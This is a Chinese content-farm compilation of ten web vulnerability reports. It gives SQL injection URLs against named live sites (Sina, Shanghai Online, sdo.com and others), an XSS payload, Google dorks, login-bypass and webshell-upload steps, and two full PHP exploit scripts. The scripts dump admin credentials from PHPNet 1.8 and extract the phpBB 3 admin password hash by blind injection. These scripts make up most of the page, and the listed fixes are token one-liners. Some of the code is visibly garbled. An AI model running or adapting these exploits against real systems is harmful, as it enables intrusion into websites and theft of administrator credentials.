当前位置：首页 > 实用文档 > 其他范文> Bambook某频道SQL注射漏洞及修复

Bambook某频道SQL注射漏洞及修复

时间：2022-08-31 07:50:38 其他范文收藏本文下载本文

Bambook某频道SQL注射漏洞及修复（整理10篇）由网友“海昌漾洁”投稿提供，以下文章小编为您整理的Bambook某频道SQL注射漏洞及修复，供大家阅读。

篇1：Bambook某频道SQL注射漏洞及修复

简要描述：由于过滤不严，Bambook某频道SQL注射漏洞，

详细说明：bbsdk.sdo.com/opus_detail.do?sid=e441a73c442b09562d26655d6d593369'%20and%201=2%20union%20select%201,2,3,@@version,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5--

sid 过滤不严，

修复方案：你知道的。

篇2：上海热线某频道SQL注射及修复

简要描述：上海热线某频道SQL注射

详细说明：train.online.sh.cn/Apply/applysubmit.aspx?classid=46760

存在SQL注射，数据库权限为sa，

上海热线某频道SQL注射及修复

，

因禁止远程查看应用程序错误的详细信息码故而把源码下载到本地分析，发现未过滤危险参数。可直接利用该注射获得服务器权限。

漏洞证明：

修复方案：包涵检测文件，过滤危险参数。

篇3：某宽频影视网高权限SQL注射漏洞及修复

国内领先的宽频影视网：中录宽频分站云视界多处ROOT注射点，其中之一：cloud.zlvod.com/index.php?r=detail&id=24009 进入云管理后台可上传任意文件，

可连接多台数据库IP。（注：未修改任何数据，测试用一句话已删除。）

修复方案：

过滤~~~

篇4：新浪某频道XSS漏洞及修复

对搜索的字符未进行有效的处理过滤造成XSS漏洞

&service=cars'>che.sina.com.cn/apps/index.php?homo=off&mod=auto&act=sinaresult&type=search&query=“>&service=cars

复制到浏览器中打开

&service=cars

可直接进行弹窗iframe等常见跨站攻击方式，

新浪某频道XSS漏洞及修复

，

修复方案：对搜索的字符进行过滤处理即可。

篇5：SantriaCMS SQL注射缺陷及修复漏洞预警

# I Think, I can, But i'm just loser

我想我行，但是我仅仅是个失败者

作者: Troy

程序介绍

开发者: www.jasawebsitemurah.info/cms/

标题: SantriaCMS SQL Injection Vulnerability

测试平台: LocalHost

Internet For Freedom

测试示例

www.badguest.cn /cms/

# www.badguest.cn /cms/view.php?idArtikel=[SQL]

修复：

过滤view.php页面idArtikel参数输入

篇6：DmxReady Bilboard v1.2 SQL注射漏洞及修复

# Exploit Title: DmxReady Bilboard v1.2 SQL Injection Vulnerability

# Google Dork: inurl:inc_billboardmanager_summary_popup.asp

# Date: 03.07.

# Author: Bellatrix

# Software Link:

www.dmxready.com/?product=billboard-manager

# Version: v1.2

#Language: ASP

# Price : $99.97

# Tested on: Windows XP Sp3

# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members....

----------------------------------------------------------------------------------------------------

Bug;

/path/admin/BillboardManager/update.asp?ItemID=xx [ SQL ATTACK]

fix：过滤update.asp页面ItemID参数输入

篇7：PHPNet = 1.8 (ler.php) SQL注射及修复漏洞预警

标题: PHPNet <= 1.8 (ler.php) SQL Injection

作者 WhiteCollarGroup

开发者: www.phpnet.com.br/

下载地址: phpbrasil.com/script/Wb03ErMczAho/phpnetartigos

影响版本: 1.8

测试平台: Debian GNU/Linux,Windows 7 Ultimate

这个系统里我们发现了多个sql注射

~> SQL Injection

This exploit is for a vulnerability in ler.php, but are the same vulnerability on imprimir.php and imagem.php.

ler.php?id=[SQLi]

imprimir.php?id=[SQLi]

imagem.php?id=[SQLi]

示例

php file.php www.xxx.com /path/

~> Login bypass

In login page, you can bypass the login using ”SQLi strings“.

Go to www.xxx.com /path/admin/login.php

Pass: wcgroup

~> 任意文件上传

After open administration panel, try to add a new article.

Use the upload form. to upload your webshell.

After posting, access:

server/path/tmp/your_shell_filename.php

~> 信息泄露

Access:

server/path/conf/config.ini

~> XSS Stored (persistent)

When posting a new article, you can post (D)HTML/Javascript. codes on the page.

function _printf($str) {

echo $str.”n“;

}

function hex($string){

$hex=''; // PHP 'Dim' =]

for ($i=0; $i < strlen($string); $i++){

$hex .= dechex(ord($string[$i]));

}

return '0x'.$hex;

}

set_time_limit(0);

error_reporting(E_ERROR & E_USER_WARNING);

@ini_set('default_socket_timeout', 30);

echo ”n“;

echo ”PHPNet <= 1.8 SQLi Exploitn“;

echo ”Discovered by WhiteCollarGroupn“;

echo ”www.wcgroup.host56.com - whitecollar_group@hotmail.com“;

if($argc!=2) {

_printf(”Usage:“);

_printf(”php $argv[0] “);

_printf(”Example:“);

_printf(”php $argv[0] www.xxx.com /path/“);

exit;

}

$target = $argv[1];

if(substr($target, (strlen($target)-1))!=”/“) { // se o ultimo caractere nao for uma barra

$target .= ”/“;

}

$inject = $target . ”ler.php?id=-0'%20“;

$token = uniqid;

$token_hex = hex($token);

// vamos agora obter os seguintes dados: user() version()

echo ”nn[*] Trying to get informations...n“;

$infos = file_get_contents($inject.urlencode(”union all select 1,2,3,4,concat(“.$token_hex.”,version(),“.$token_hex.”,user(),“.$token_hex.”),6,7,8-- “));

$infos_r = array();

preg_match_all(”/$token(.*)$token(.*)$token/“, $infos, $infos_r);

$user = $infos_r[1][0];

$version = $infos_r[2][0];

if(($user) AND ($version))

{

echo ”[!] MySQL user: $usern“;

echo ”[!] MySQL version: $versionn“;

}

else

{

echo ”[-] Error while getting informations...n“;

}

$i = 0;

while(1==1) {

$dados_r = array();

$dados = file_get_contents($inject.urlencode(”union all select 1,2,3,4,concat(“.$token_hex.”,admin_user,“.$token_hex.”,admin_pass,“.$token_hex.”),6,7,8 from pna_admin limit $i,1-- “));

preg_match_all(”/$token(.*)$token(.*)$token/“, $dados, $dados_r);

$login = $dados_r[1][0];

$senha = $dados_r[2][0];

if(($login) AND ($senha)) {

echo ” -+-n“;

echo ”[!] User: $loginn“;

echo ”[!] Pass: $senhan“;

$i++;

} else {

break; // exitloop

}

if($i==0) {

echo ”[-] Exploit failed. Make sure that's server is using a valid version of PHPNet without mod_security. We're sorry.“;

} else {

echo ” -+-n[!] :D“;

}

echo ”n“;

}

篇8：GIMS研究生管理系统SQL注射&上传漏洞(含修复)

1、SQL注入，无需登录：

2、利用IIS解析漏洞上传：

/gmis/xkjsb/dskyinfo/dskyInfoBs1.aspx?id=1

导师照片存储方式为导师代码+.jpg

修改页面元素中导师代码的value值为1.asp;1,点重新上传即可得到webshell

XXXX.edu.cn/gmis/dsphoto/1.asp;1.jpg

作者 Dreama

篇9：Sheffield SQL注射缺陷及修复

#########################################################

# Title : Sheffield SQL Injection Vulnerability

# Author: Kalashinkov3

# Home : 13000 / ALGERIA

# Website : 1337day.com / dis9.com

# Vendor: www.resounddesign.co.uk

# Email : kalashinkov3[at]Hotmail[dot]Fr

# Date : 26/06/

# Google Dork : intext:”Site by Resound Design Web Design Sheffield“

# Category : Webapps

#########################################################

[+] Exploit :)

# /article.php?id=1

# /article.php?id=[SQLi]

# /shop.php?id=1

# /shop.php?id=[SQLi]

# /*.php?id=1

# /*.php?id=[SQLi]

[+] Login Admin :

# /admin

^_^ G00d LUCK ALL :=)

修复：过滤相关页面参数输入

+ Greets To==================================================================+

BrOx-dz, KedAns-Dz, Caddy-Dz, KnocKout, toxic-kim, [Lila Far=>D], Keinji1258 +

ALLA Foundou,586, 1337day.com, packetstormsecurity.org, Exploit-id.com +

andhrahackers.com, 1337day.com/team, id-backtrack.com, dis9.com/team +

# all Algerians HackerS ;), All My Friends # +

<3 I Love You Lila <3

篇10：phpBB 3.0 SQL注射漏洞

摘自www.kanwi.c n

#!/usr/bin/php -q -d short_open_tag=on

echo ”PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure “;

echo ”by rgod rgod@autistici.org “;

echo ”site: retrogod.altervista.org “;

echo ”dork, version specific: “Powered by phpBB * 2002, 2006 phpBB Group” “;

works regardless of php.ini settings

you need a global moderator account with ”simple moderator“ role

if ($argc<5) {

echo ”Usage: php “.$argv[0].” host path user pass OPTIONS “;

echo ”host: target server (ip/hostname) “;

echo ”path: path to phpbb3 “;

echo ”user/pass: u need a valid user account with global moderator rights “;

echo ”Options: “;

echo ” -T[prefix] specify a table prefix different from default (phpbb_) “;

echo ” -p[port]: specify a port other than 80 “;

echo ” -P[ip:port]: specify a proxy “;

echo ” -u[number]: specify a user id other than 2 (admin) “;

echo ” -x: disclose table prefix through error messages “;

echo ”Example: “;

echo ”php “.$argv[0].” localhost /phpbb3/ rgod suntzu-u-u “;

echo ”php “.$argv[0].” localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7 “;

die;

}

error_reporting(0);

ini_set(”max_execution_time“,0);

ini_set(”default_socket_timeout“,5);

function quick_dump($string)

{

$result='';$exa='';$cont=0;

for ($i=0; $i<=strlen($string)-1; $i++)

{

if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))

{$result.=” .“;}

else

{$result.=” “.$string[$i];}

if (strlen(dechex(ord($string[$i])))==2)

{$exa.=” “.dechex(ord($string[$i]));}

else

{$exa.=” 0“.dechex(ord($string[$i]));}

$cont++;if ($cont==15) {$cont=0; $result.=” “; $exa.=” “;}

}

return $exa.” “.$result;

}

$proxy_regex = '(d{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5})';

function sendpacketii($packet)

{

global $proxy, $host, $port, $html, $proxy_regex;

if ($proxy=='') {

$ock=fsockopen(gethostbyname($host),$port);

if (!$ock) {

echo 'No response from '.$host.':'.$port; die;

}

else {

$c = preg_match($proxy_regex,$proxy);

if (!$c) {

echo 'Not a valid proxy...';die;

}

$parts=explode(':',$proxy);

echo ”Connecting to “.$parts[0].”:“.$parts[1].” proxy... “;

$ock=fsockopen($parts[0],$parts[1]);

if (!$ock) {

echo 'No response from proxy...';die;

}

fputs($ock,$packet);

if ($proxy=='') {

$html='';

while (!feof($ock)) {

$html.=fgets($ock);

}

else {

$html='';

while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {

$html.=fread($ock,1);

}

fclose($ock);

#debug

#echo ” “.$html;

}

$host=$argv[1];

$path=$argv[2];

$user=$argv[3];

$pass=$argv[4];

$port=80;

$prefix=”PHPBB_“;

$user_id=”2“;//admin

$discl=0;

$proxy=”“;

for ($i=3; $i<=$argc-1; $i++){

$temp=$argv[$i][0].$argv[$i][1];

if ($temp==”-p“)

{

$port=str_replace(”-p“,”“,$argv[$i]);

}

if ($temp==”-P“)

{

$proxy=str_replace(”-P“,”“,$argv[$i]);

}

if ($temp==”-T“)

{

$prefix=str_replace(”-T“,”“,$argv[$i]);

}

if ($temp==”-u“)

{

$user_id=str_replace(”-u“,”“,$argv[$i]);

}

if ($temp==”-x“)

{

$discl=1;

}

if (($path[0]'/') or ($path[strlen($path)-1]'/')) {echo 'Error... check the path!'; die;}

if ($proxy=='') {$p=$path;} else {$p=''.$host.':'.$port.$path;}

$data=”username=“.urlencode($user);

$data.=”&password=“.urlencode($pass);

$data.=”&redirect=index.php“;

$data.=”&login=Login“;

$packet=”POST “.$p.”ucp.php?mode=login HTTP/1.0 “;

$packet.=”Referer: $host$path/ucp.php?mode=login “;

$packet.=”Content-Type: application/x-www-form-urlencoded “;

$packet.=”Accept-Encoding: text/plain “;

$packet.=”Host: “.$host.” “;

$packet.=”Content-Length: “.strlen($data).” “;

$packet.=”Connection: Close “;

$packet.=$data;

sendpacketii($packet);

$cookie=”“;

$temp=explode(”Set-Cookie: “,$html);

for ($i=1; $i<=count($temp)-1; $i++)

{

$temp2=explode(” “,$temp[$i]);

$cookie.=” “.$temp2[0];

}

if (eregi(”_u=1;“,$cookie))

{

//echo $html.” “;//debug

//die(”Unable to login...“);

}

echo ”cookie -> “.$cookie.” “;

if ($discl)

{

$sql=”'suntzuuuuu“;

echo ”sql -> “.$sql.” “;

$sql=urlencode(strtoupper($sql));

$data=”username=“;

$data.=”&icq=“;

$data.=”&email=“;

$data.=”&aim=“;

$data.=”&joined_select=lt“;

$data.=”&joined=“;

$data.=”&yahoo=“;

$data.=”&active_select=lt“;

$data.=”&active=“;

$data.=”&msn=“;

$data.=”&count_select=eq“;

$data.=”&count=“;

$data.=”&jabber=“;

$data.=”&sk=c“;

$data.=”&sd=a“;

$data.=”&ip=“.$sql;

$data.=”&search_group_id=0“;

$data.=”&submit=Search“;

$packet=”POST “.$p.”memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0 “;

$packet.=”Content-Type: application/x-www-form-urlencoded “;

$packet.=”Host: “.$host.” “;

$packet.=”Content-Length: “.strlen($data).” “;

$packet.=”Connection: Close “;

$packet.=”Cookie: “.$cookie.” “;

$packet.=$data;

sendpacketii($packet);

if (strstr($html,”You have an error in your SQL syntax“))

{

$temp=explode(”posts“,$html);

$temp2=explode(” “,$temp[0]);

$prefix=strtoupper($temp2[count($temp2)-1]);

echo ”prefix -> “.$prefix.” “;sleep(2);

}

$md5s[0]=0;//null

$md5s=array_merge($md5s,range(48,57)); //numbers

$md5s=array_merge($md5s,range(97,102));//a-f letters

//print_r(array_values($md5s));

$j=1;$password=”“;

while (!strstr($password,chr(0)))

{

for ($i=0; $i<=255; $i++)

{

if (in_array($i,$md5s))

{

$sql=”1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,“.$j.”,1))=$i),$user_id,-1) FROM “.$prefix.”USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM “.$prefix.”POSTS WHERE POSTER_IP IN ('1.1.1.999“;

echo ”sql -> “.$sql.” “;

$sql=urlencode(strtoupper($sql));

$data=”username=“;

$data.=”&icq=“;

$data.=”&email=“;

$data.=”&aim=“;

$data.=”&joined_select=lt“;

$data.=”&joined=“;

$data.=”&yahoo=“;

$data.=”&active_select=lt“;

$data.=”&active=“;

$data.=”&msn=“;

$data.=”&count_select=eq“;

$data.=”&count=“;

$data.=”&jabber=“;

$data.=”&sk=c“;

$data.=”&sd=a“;

$data.=”&ip=“.$sql;

$data.=”&search_group_id=0“;

$data.=”&submit=Search“;

$packet=”POST “.$p.”memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0 “;

$packet.=”Content-Type: application/x-www-form-urlencoded “;

$packet.=”Host: “.$host.” “;

$packet.=”Content-Length: “.strlen($data).” “;

$packet.=”Connection: Close “;

$packet.=”Cookie: “.$cookie.” “;

$packet.=$data;

sendpacketii($packet);

if (!strstr($html,”No members found for this search criteria“)) {$password.=chr($i);echo ”password -> “.$password.”[???] “;sleep(2);break;}

}

if ($i==255) {die(”Exploit failed...“);}

}

$j++;

}

$j=1;$admin=”“;

while (!strstr($admin,chr(0)))

{

for ($i=0; $i<=255; $i++)

{

$sql=”1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,“.$j.”,1))=$i),$user_id,-1) FROM “.$prefix.”USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM “.$prefix.”POSTS WHERE POSTER_IP IN ('1.1.1.999“;

echo ”sql -> “.$sql.” “;

$sql=urlencode(strtoupper($sql));

$data=”username=“;

$data.=”&icq=“;

$data.=”&email=“;

$data.=”&aim=“;

$data.=”&joined_select=lt“;

$data.=”&joined=“;

$data.=”&yahoo=“;

$data.=”&active_select=lt“;

$data.=”&active=“;

$data.=”&msn=“;

$data.=”&count_select=eq“;

$data.=”&count=“;

$data.=”&jabber=“;

$data.=”&sk=c“;

$data.=”&sd=a“;

$data.=”&ip=“.$sql;

$data.=”&search_group_id=0“;

$data.=”&submit=Search“;

$packet=”POST “.$p.”memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0 “;

$packet.=”Content-Type: application/x-www-form-urlencoded “;

$packet.=”Host: “.$host.” “;

$packet.=”Content-Length: “.strlen($data).” “;

$packet.=”Connection: Close “;

$packet.=”Cookie: “.$cookie.” “;

$packet.=$data;

sendpacketii($packet);

if (!strstr($html,”No members found for this search criteria“)) {$admin.=chr($i);echo ”password -> “.$admin.”[???] “;sleep(2);break;}

}

if ($i==255) {die(”Exploit failed...“);}

$j++;

}